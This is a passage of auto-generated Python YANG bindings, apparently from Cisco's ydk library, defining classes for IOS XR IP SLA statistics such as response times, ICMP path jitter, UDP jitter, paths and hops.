        # Register this node's YANG metadata and leaf schema, then reset every
        # leaf value to None (unset).
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.CommonStats, self).__init__()
        self.yang_name = "common-stats"        # YANG container name
        self.yang_parent_name = "target"       # enclosing YANG container
        self.is_top_level_class = False
        self.has_list_ancestor = True          # an ancestor node is a keyed list
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])  # leaf-only node: no child containers
        self._child_list_classes = OrderedDict([])       # no child lists
        # NOTE: _leafs must be populated before the leaf attributes below are
        # assigned — __setattr__ funnels every assignment through
        # _perform_setattr, which presumably consults this mapping (Entity
        # internals not visible here).
        self._leafs = OrderedDict([
            ('operation_time', YLeaf(YType.uint64, 'operation-time')),
            ('return_code', YLeaf(YType.enumeration, 'return-code')),
            ('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
            ('response_time', YLeaf(YType.uint32, 'response-time')),
            ('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
            ('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
            ('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
            ('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
            ('update_count', YLeaf(YType.uint32, 'update-count')),
            ('ok_count', YLeaf(YType.uint32, 'ok-count')),
            ('disconnect_count', YLeaf(YType.uint32, 'disconnect-count')),
            ('timeout_count', YLeaf(YType.uint32, 'timeout-count')),
            ('busy_count', YLeaf(YType.uint32, 'busy-count')),
            ('no_connection_count', YLeaf(YType.uint32, 'no-connection-count')),
            ('dropped_count', YLeaf(YType.uint32, 'dropped-count')),
            ('internal_error_count', YLeaf(YType.uint32, 'internal-error-count')),
            ('sequence_error_count', YLeaf(YType.uint32, 'sequence-error-count')),
            ('verify_error_count', YLeaf(YType.uint32, 'verify-error-count')),
        ])
        # All leaves start unset.
        self.operation_time = None
        self.return_code = None
        self.response_time_count = None
        self.response_time = None
        self.min_response_time = None
        self.max_response_time = None
        self.sum_response_time = None
        self.sum2_response_time = None
        self.update_count = None
        self.ok_count = None
        self.disconnect_count = None
        self.timeout_count = None
        self.busy_count = None
        self.no_connection_count = None
        self.dropped_count = None
        self.internal_error_count = None
        self.sequence_error_count = None
        self.verify_error_count = None
        # Relative path segment of this node within its parent's XPath.
        self._segment_path = lambda: "common-stats"

    def __setattr__(self, name, value):
        # Route attribute assignment through Entity machinery, restricted to
        # the declared leaf names so unknown attributes are rejected/handled
        # by _perform_setattr.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.CommonStats, ['operation_time', 'return_code', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'update_count', 'ok_count', 'disconnect_count', 'timeout_count', 'busy_count', 'no_connection_count', 'dropped_count', 'internal_error_count', 'sequence_error_count', 'verify_error_count'], name, value)
class SpecificStats(Entity):
    """
    Operation Specific Stats
    .. attribute:: icmp_path_jitter_stats
    icmp path jitter stats
    **type**\: :py:class:`IcmpPathJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.IcmpPathJitterStats>`
    .. attribute:: udp_jitter_stats
    udp jitter stats
    **type**\: :py:class:`UdpJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.UdpJitterStats>`
    .. attribute:: op_type
    op type
    **type**\: :py:class:`OpTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.OpTypeEnum>`
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Register schema metadata, the single 'op-type' leaf, and the two
        # child containers (icmp-path-jitter-stats, udp-jitter-stats).
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats, self).__init__()
        self.yang_name = "specific-stats"      # YANG container name
        self.yang_parent_name = "target"       # enclosing YANG container
        self.is_top_level_class = False
        self.has_list_ancestor = True          # an ancestor node is a keyed list
        self.ylist_key_names = []
        # Map YANG child names -> (python attribute, binding class).
        self._child_container_classes = OrderedDict([("icmp-path-jitter-stats", ("icmp_path_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.IcmpPathJitterStats)), ("udp-jitter-stats", ("udp_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.UdpJitterStats))])
        self._child_list_classes = OrderedDict([])
        # NOTE: _leafs must be set before leaf attributes are assigned —
        # __setattr__ routes assignments through _perform_setattr.
        self._leafs = OrderedDict([
            ('op_type', YLeaf(YType.enumeration, 'op-type')),
        ])
        self.op_type = None
        # Eagerly instantiate both child containers and link them back to
        # this node as their parent.
        self.icmp_path_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.IcmpPathJitterStats()
        self.icmp_path_jitter_stats.parent = self
        self._children_name_map["icmp_path_jitter_stats"] = "icmp-path-jitter-stats"
        self._children_yang_names.add("icmp-path-jitter-stats")
        self.udp_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.UdpJitterStats()
        self.udp_jitter_stats.parent = self
        self._children_name_map["udp_jitter_stats"] = "udp-jitter-stats"
        self._children_yang_names.add("udp-jitter-stats")
        # Relative path segment of this node within its parent's XPath.
        self._segment_path = lambda: "specific-stats"

    def __setattr__(self, name, value):
        # Route attribute assignment through Entity machinery; only 'op_type'
        # is a settable leaf on this node.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats, ['op_type'], name, value)

    class IcmpPathJitterStats(Entity):
        """
        icmp path jitter stats
        .. attribute:: source_address
        IP Address of the source
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        .. attribute:: dest_address
        IP Address of the destination
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        .. attribute:: hop_address
        IP address of the hop in the path
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        .. attribute:: packet_interval
        Interval between echos in ms
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: response_time_count
        Number of RTT samples used for the statistics
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: response_time
        RTT
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: min_response_time
        Minimum RTT
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: max_response_time
        Maximum RTT
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: sum_response_time
        Sum of RTT
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: sum2_response_time
        Sum of RTT^2
        **type**\: int
        **range:** 0..18446744073709551615
        .. attribute:: packet_count
        Number of Echo replies received
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: packet_loss_count
        Number of packets lost
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: out_of_sequence_count
        Number of out of sequence packets
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: discarded_sample_count
        Number of discarded samples
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: verify_errors_count
        Number of packets with data corruption
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: dropped_error_count
        Number of packets dropped
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: jitter
        Jitter value for this node in the path
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: pos_jitter_sum
        Sum of positive jitter value
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: pos_jitter_sum2
        Sum of squares of positive jitter values
        **type**\: int
        **range:** 0..18446744073709551615
        .. attribute:: pos_jitter_min
        Minimum positive jitter value
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: pos_jitter_max
        Maximum positive jitter value
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: pos_jitter_count
        Number of positive jitter values
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: neg_jitter_sum
        Sum of negative jitter values
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: neg_jitter_min
        Minimum negative jitter value
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: neg_jitter_max
        Maximum negative jitter value
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: neg_jitter_sum2
        Sum of squares of negative jitter values
        **type**\: int
        **range:** 0..18446744073709551615
        .. attribute:: neg_jitter_count
        Number of negative jitter values
        **type**\: int
        **range:** 0..4294967295
        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'man-ipsla-oper'
        _revision = '2015-11-09'

        def __init__(self):
            # Register this leaf-only container's schema and reset all leaf
            # values to None (unset).
            super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.IcmpPathJitterStats, self).__init__()
            self.yang_name = "icmp-path-jitter-stats"   # YANG container name
            self.yang_parent_name = "specific-stats"    # enclosing YANG container
            self.is_top_level_class = False
            self.has_list_ancestor = True               # an ancestor node is a keyed list
            self.ylist_key_names = []
            self._child_container_classes = OrderedDict([])  # leaf-only: no children
            self._child_list_classes = OrderedDict([])
            # NOTE: _leafs must be set before the leaf attributes below
            # (assignments are intercepted by __setattr__).
            self._leafs = OrderedDict([
                ('source_address', YLeaf(YType.str, 'source-address')),
                ('dest_address', YLeaf(YType.str, 'dest-address')),
                ('hop_address', YLeaf(YType.str, 'hop-address')),
                ('packet_interval', YLeaf(YType.uint32, 'packet-interval')),
                ('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
                ('response_time', YLeaf(YType.uint32, 'response-time')),
                ('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
                ('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
                ('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
                ('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
                ('packet_count', YLeaf(YType.uint32, 'packet-count')),
                ('packet_loss_count', YLeaf(YType.uint32, 'packet-loss-count')),
                ('out_of_sequence_count', YLeaf(YType.uint32, 'out-of-sequence-count')),
                ('discarded_sample_count', YLeaf(YType.uint32, 'discarded-sample-count')),
                ('verify_errors_count', YLeaf(YType.uint32, 'verify-errors-count')),
                ('dropped_error_count', YLeaf(YType.uint32, 'dropped-error-count')),
                ('jitter', YLeaf(YType.uint32, 'jitter')),
                ('pos_jitter_sum', YLeaf(YType.uint32, 'pos-jitter-sum')),
                ('pos_jitter_sum2', YLeaf(YType.uint64, 'pos-jitter-sum2')),
                ('pos_jitter_min', YLeaf(YType.uint32, 'pos-jitter-min')),
                ('pos_jitter_max', YLeaf(YType.uint32, 'pos-jitter-max')),
                ('pos_jitter_count', YLeaf(YType.uint32, 'pos-jitter-count')),
                ('neg_jitter_sum', YLeaf(YType.uint32, 'neg-jitter-sum')),
                ('neg_jitter_min', YLeaf(YType.uint32, 'neg-jitter-min')),
                ('neg_jitter_max', YLeaf(YType.uint32, 'neg-jitter-max')),
                ('neg_jitter_sum2', YLeaf(YType.uint64, 'neg-jitter-sum2')),
                ('neg_jitter_count', YLeaf(YType.uint32, 'neg-jitter-count')),
            ])
            # All leaves start unset.
            self.source_address = None
            self.dest_address = None
            self.hop_address = None
            self.packet_interval = None
            self.response_time_count = None
            self.response_time = None
            self.min_response_time = None
            self.max_response_time = None
            self.sum_response_time = None
            self.sum2_response_time = None
            self.packet_count = None
            self.packet_loss_count = None
            self.out_of_sequence_count = None
            self.discarded_sample_count = None
            self.verify_errors_count = None
            self.dropped_error_count = None
            self.jitter = None
            self.pos_jitter_sum = None
            self.pos_jitter_sum2 = None
            self.pos_jitter_min = None
            self.pos_jitter_max = None
            self.pos_jitter_count = None
            self.neg_jitter_sum = None
            self.neg_jitter_min = None
            self.neg_jitter_max = None
            self.neg_jitter_sum2 = None
            self.neg_jitter_count = None
            # Relative path segment of this node within its parent's XPath.
            self._segment_path = lambda: "icmp-path-jitter-stats"

        def __setattr__(self, name, value):
            # Route attribute assignment through Entity machinery, restricted
            # to the declared leaf names.
            self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.IcmpPathJitterStats, ['source_address', 'dest_address', 'hop_address', 'packet_interval', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'packet_count', 'packet_loss_count', 'out_of_sequence_count', 'discarded_sample_count', 'verify_errors_count', 'dropped_error_count', 'jitter', 'pos_jitter_sum', 'pos_jitter_sum2', 'pos_jitter_min', 'pos_jitter_max', 'pos_jitter_count', 'neg_jitter_sum', 'neg_jitter_min', 'neg_jitter_max', 'neg_jitter_sum2', 'neg_jitter_count'], name, value)

    class UdpJitterStats(Entity):
        """
        udp jitter stats
        .. attribute:: jitter_in
        Input Jitter moving average, computed as per RFC1889
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: jitter_out
        Output Jitter moving average, computed as per RFC1889
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: packet_loss_sd
        Packets lost in source to destination (SD) direction
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: packet_loss_ds
        Packets lost in destination to source (DS) direction
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: packet_out_of_sequence
        Packets out of sequence
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: packet_mia
        Packets missing in action (cannot determine if theywere lost in SD or DS direction
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: packet_skipped
        Packets which are skipped
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: packet_late_arrivals
        Packets arriving late
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: packet_invalid_tstamp
        Packets with bad timestamps
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: internal_errors_count
        Number of internal errors
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: busies_count
        Number of busies
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: positive_sd_sum
        Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in SD direction Measured in milliseconds
        **type**\: int
        **range:** 0..4294967295
        **units**\: millisecond
        .. attribute:: positive_sd_sum2
        Sum of squares of positive jitter values in SD direction
        **type**\: int
        **range:** 0..18446744073709551615
        .. attribute:: positive_sd_min
        Minimum of positive jitter values in SD direction
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: positive_sd_max
        Maximum of positive jitter values in SD direction
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: positive_sd_count
        Number of positive jitter values in SD direction
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: negative_sd_sum
        Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in SD direction Measured in milliseconds
        **type**\: int
        **range:** 0..4294967295
        **units**\: millisecond
        .. attribute:: negative_sd_sum2
        Sum of squares of negative jitter values in SD direction
        **type**\: int
        **range:** 0..18446744073709551615
        .. attribute:: negative_sd_min
        Minimum of negative jitter values in SD direction
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: negative_sd_max
        Maximum of negative jitter values in SD direction
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: negative_sd_count
        Number of negative jitter values in SD direction
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: positive_ds_sum
        Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in DS direction Measured in milliseconds
        **type**\: int
        **range:** 0..4294967295
        **units**\: millisecond
        .. attribute:: positive_ds_sum2
        Sum of squares of positive jitter values in DS direction
        **type**\: int
        **range:** 0..18446744073709551615
        .. attribute:: positive_ds_min
        Minimum of positive jitter values in DS direction
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: positive_ds_max
        Maximum of positive jitter values in DS direction
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: positive_ds_count
        Number of positive jitter values in DS direction
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: negative_ds_sum
        Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in DS direction Measured in milliseconds
        **type**\: int
        **range:** 0..4294967295
        **units**\: millisecond
        .. attribute:: negative_ds_sum2
        Sum of squares of negative jitter values in DS direction
        **type**\: int
        **range:** 0..18446744073709551615
        .. attribute:: negative_ds_min
        Minimum of negative jitter values in DS direction
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: negative_ds_max
        Maximum of negative jitter values in DS direction
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: negative_ds_count
        Number of negative jitter values in DS direction
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: one_way_count
        Number of probe/probe\-response pairs used to compute one\-way statistics
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: one_way_sd_min
        Minimum of one\-way jitter values in SD direction (msec)
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: one_way_sd_max
        Maximum of one\-way jitter values in SD direction (msec)
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: one_way_sd_sum
        Sum of one\-way jitter values in SD direction (msec)
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: one_way_sd_sum2
        Sum of squares of one\-way jitter values in SD direction (msec)
        **type**\: int
        **range:** 0..18446744073709551615
        .. attribute:: one_way_ds_min
        Minimum of one\-way jitter values in DS direction (msec)
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: one_way_ds_max
        Maximum of one\-way jitter values in DS direction (msec)
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: one_way_ds_sum
        Sum of one\-way jitter values in DS direction (msec)
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: one_way_ds_sum2
        Sum of squares of the OneWayMinDS and OneWayMaxDS values (msec)
        **type**\: int
        **range:** 0..18446744073709551615
        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'man-ipsla-oper'
        _revision = '2015-11-09'

        def __init__(self):
            # Register this leaf-only container's schema and reset all leaf
            # values to None (unset).
            super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.UdpJitterStats, self).__init__()
            self.yang_name = "udp-jitter-stats"         # YANG container name
            self.yang_parent_name = "specific-stats"    # enclosing YANG container
            self.is_top_level_class = False
            self.has_list_ancestor = True               # an ancestor node is a keyed list
            self.ylist_key_names = []
            self._child_container_classes = OrderedDict([])  # leaf-only: no children
            self._child_list_classes = OrderedDict([])
            # NOTE: _leafs must be set before the leaf attributes below
            # (assignments are intercepted by __setattr__).
            self._leafs = OrderedDict([
                ('jitter_in', YLeaf(YType.uint32, 'jitter-in')),
                ('jitter_out', YLeaf(YType.uint32, 'jitter-out')),
                ('packet_loss_sd', YLeaf(YType.uint32, 'packet-loss-sd')),
                ('packet_loss_ds', YLeaf(YType.uint32, 'packet-loss-ds')),
                ('packet_out_of_sequence', YLeaf(YType.uint32, 'packet-out-of-sequence')),
                ('packet_mia', YLeaf(YType.uint32, 'packet-mia')),
                ('packet_skipped', YLeaf(YType.uint32, 'packet-skipped')),
                ('packet_late_arrivals', YLeaf(YType.uint32, 'packet-late-arrivals')),
                ('packet_invalid_tstamp', YLeaf(YType.uint32, 'packet-invalid-tstamp')),
                ('internal_errors_count', YLeaf(YType.uint32, 'internal-errors-count')),
                ('busies_count', YLeaf(YType.uint32, 'busies-count')),
                ('positive_sd_sum', YLeaf(YType.uint32, 'positive-sd-sum')),
                ('positive_sd_sum2', YLeaf(YType.uint64, 'positive-sd-sum2')),
                ('positive_sd_min', YLeaf(YType.uint32, 'positive-sd-min')),
                ('positive_sd_max', YLeaf(YType.uint32, 'positive-sd-max')),
                ('positive_sd_count', YLeaf(YType.uint32, 'positive-sd-count')),
                ('negative_sd_sum', YLeaf(YType.uint32, 'negative-sd-sum')),
                ('negative_sd_sum2', YLeaf(YType.uint64, 'negative-sd-sum2')),
                ('negative_sd_min', YLeaf(YType.uint32, 'negative-sd-min')),
                ('negative_sd_max', YLeaf(YType.uint32, 'negative-sd-max')),
                ('negative_sd_count', YLeaf(YType.uint32, 'negative-sd-count')),
                ('positive_ds_sum', YLeaf(YType.uint32, 'positive-ds-sum')),
                ('positive_ds_sum2', YLeaf(YType.uint64, 'positive-ds-sum2')),
                ('positive_ds_min', YLeaf(YType.uint32, 'positive-ds-min')),
                ('positive_ds_max', YLeaf(YType.uint32, 'positive-ds-max')),
                ('positive_ds_count', YLeaf(YType.uint32, 'positive-ds-count')),
                ('negative_ds_sum', YLeaf(YType.uint32, 'negative-ds-sum')),
                ('negative_ds_sum2', YLeaf(YType.uint64, 'negative-ds-sum2')),
                ('negative_ds_min', YLeaf(YType.uint32, 'negative-ds-min')),
                ('negative_ds_max', YLeaf(YType.uint32, 'negative-ds-max')),
                ('negative_ds_count', YLeaf(YType.uint32, 'negative-ds-count')),
                ('one_way_count', YLeaf(YType.uint32, 'one-way-count')),
                ('one_way_sd_min', YLeaf(YType.uint32, 'one-way-sd-min')),
                ('one_way_sd_max', YLeaf(YType.uint32, 'one-way-sd-max')),
                ('one_way_sd_sum', YLeaf(YType.uint32, 'one-way-sd-sum')),
                ('one_way_sd_sum2', YLeaf(YType.uint64, 'one-way-sd-sum2')),
                ('one_way_ds_min', YLeaf(YType.uint32, 'one-way-ds-min')),
                ('one_way_ds_max', YLeaf(YType.uint32, 'one-way-ds-max')),
                ('one_way_ds_sum', YLeaf(YType.uint32, 'one-way-ds-sum')),
                ('one_way_ds_sum2', YLeaf(YType.uint64, 'one-way-ds-sum2')),
            ])
            # All leaves start unset.
            self.jitter_in = None
            self.jitter_out = None
            self.packet_loss_sd = None
            self.packet_loss_ds = None
            self.packet_out_of_sequence = None
            self.packet_mia = None
            self.packet_skipped = None
            self.packet_late_arrivals = None
            self.packet_invalid_tstamp = None
            self.internal_errors_count = None
            self.busies_count = None
            self.positive_sd_sum = None
            self.positive_sd_sum2 = None
            self.positive_sd_min = None
            self.positive_sd_max = None
            self.positive_sd_count = None
            self.negative_sd_sum = None
            self.negative_sd_sum2 = None
            self.negative_sd_min = None
            self.negative_sd_max = None
            self.negative_sd_count = None
            self.positive_ds_sum = None
            self.positive_ds_sum2 = None
            self.positive_ds_min = None
            self.positive_ds_max = None
            self.positive_ds_count = None
            self.negative_ds_sum = None
            self.negative_ds_sum2 = None
            self.negative_ds_min = None
            self.negative_ds_max = None
            self.negative_ds_count = None
            self.one_way_count = None
            self.one_way_sd_min = None
            self.one_way_sd_max = None
            self.one_way_sd_sum = None
            self.one_way_sd_sum2 = None
            self.one_way_ds_min = None
            self.one_way_ds_max = None
            self.one_way_ds_sum = None
            self.one_way_ds_sum2 = None
            # Relative path segment of this node within its parent's XPath.
            self._segment_path = lambda: "udp-jitter-stats"

        def __setattr__(self, name, value):
            # Route attribute assignment through Entity machinery, restricted
            # to the declared leaf names.
            self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.UdpJitterStats, ['jitter_in', 'jitter_out', 'packet_loss_sd', 'packet_loss_ds', 'packet_out_of_sequence', 'packet_mia', 'packet_skipped', 'packet_late_arrivals', 'packet_invalid_tstamp', 'internal_errors_count', 'busies_count', 'positive_sd_sum', 'positive_sd_sum2', 'positive_sd_min', 'positive_sd_max', 'positive_sd_count', 'negative_sd_sum', 'negative_sd_sum2', 'negative_sd_min', 'negative_sd_max', 'negative_sd_count', 'positive_ds_sum', 'positive_ds_sum2', 'positive_ds_min', 'positive_ds_max', 'positive_ds_count', 'negative_ds_sum', 'negative_ds_sum2', 'negative_ds_min', 'negative_ds_max', 'negative_ds_count', 'one_way_count', 'one_way_sd_min', 'one_way_sd_max', 'one_way_sd_sum', 'one_way_sd_sum2', 'one_way_ds_min', 'one_way_ds_max', 'one_way_ds_sum', 'one_way_ds_sum2'], name, value)
class Paths(Entity):
    """
    Table of paths identified in the 1\-hour
    interval
    .. attribute:: path
    Paths identified in a 1\-hour interval
    **type**\: list of :py:class:`Path <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path>`
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Register schema metadata; this container holds only the 'path'
        # YANG list (no leaves of its own).
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths, self).__init__()
        self.yang_name = "paths"                    # YANG container name
        self.yang_parent_name = "non-distributed"   # enclosing YANG container
        self.is_top_level_class = False
        self.has_list_ancestor = True               # an ancestor node is a keyed list
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        # Single child list: 'path' entries are Path instances.
        self._child_list_classes = OrderedDict([("path", ("path", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path))])
        self._leafs = OrderedDict()                 # no leaves on this node
        self.path = YList(self)                     # dynamic list of Path children
        # Relative path segment of this node within its parent's XPath.
        self._segment_path = lambda: "paths"

    def __setattr__(self, name, value):
        # No settable leaves; all assignments still go through Entity machinery.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths, [], name, value)
class Path(Entity):
    """
    Paths identified in a 1\-hour interval
    .. attribute:: path_index (key)
    Path Index
    **type**\: int
    **range:** \-2147483648..2147483647
    .. attribute:: hops
    Table of hops for a particular path
    **type**\: :py:class:`Hops <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops>`
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # List entry keyed by 'path-index', with one child container ('hops').
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path, self).__init__()
        self.yang_name = "path"             # YANG list name
        self.yang_parent_name = "paths"     # enclosing YANG container
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['path_index']   # YANG list key leaf
        self._child_container_classes = OrderedDict([("hops", ("hops", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops))])
        self._child_list_classes = OrderedDict([])
        # NOTE: _leafs must be set before the key attribute is assigned below.
        self._leafs = OrderedDict([
            ('path_index', YLeaf(YType.int32, 'path-index')),
        ])
        self.path_index = None              # list key; unset until populated
        # Eagerly instantiate the 'hops' child container and link it back.
        self.hops = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops()
        self.hops.parent = self
        self._children_name_map["hops"] = "hops"
        self._children_yang_names.add("hops")
        # XPath segment includes the key predicate, e.g. path[path-index='3'].
        self._segment_path = lambda: "path" + "[path-index='" + str(self.path_index) + "']"

    def __setattr__(self, name, value):
        # Route attribute assignment through Entity machinery; only the key
        # leaf 'path_index' is settable.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path, ['path_index'], name, value)
class Hops(Entity):
    """
    Table of hops for a particular path
    .. attribute:: hop
    Total 1\-hour aggregated statistics for a hop in a path\-enabled operation
    **type**\: list of :py:class:`Hop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop>`
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Register schema metadata; this container holds only the 'hop'
        # YANG list (no leaves of its own).
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops, self).__init__()
        self.yang_name = "hops"             # YANG container name
        self.yang_parent_name = "path"      # enclosing YANG list entry
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        # Single child list: 'hop' entries are Hop instances.
        self._child_list_classes = OrderedDict([("hop", ("hop", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop))])
        self._leafs = OrderedDict()         # no leaves on this node
        self.hop = YList(self)              # dynamic list of Hop children
        # Relative path segment of this node within its parent's XPath.
        self._segment_path = lambda: "hops"

    def __setattr__(self, name, value):
        # No settable leaves; all assignments still go through Entity machinery.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops, [], name, value)
class Hop(Entity):
    """
    Total 1\-hour aggregated statistics
    for a hop in a path\-enabled operation
    .. attribute:: hop_index (key)
